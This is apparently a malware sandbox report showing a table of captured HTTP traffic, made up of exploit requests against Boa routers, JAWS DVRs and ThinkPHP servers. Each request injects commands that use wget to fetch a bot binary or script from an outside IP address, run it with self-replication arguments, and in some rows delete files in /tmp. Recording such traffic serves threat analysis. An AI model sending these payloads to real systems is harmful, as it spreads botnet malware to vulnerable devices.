| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Play interactive tour
Edit tour
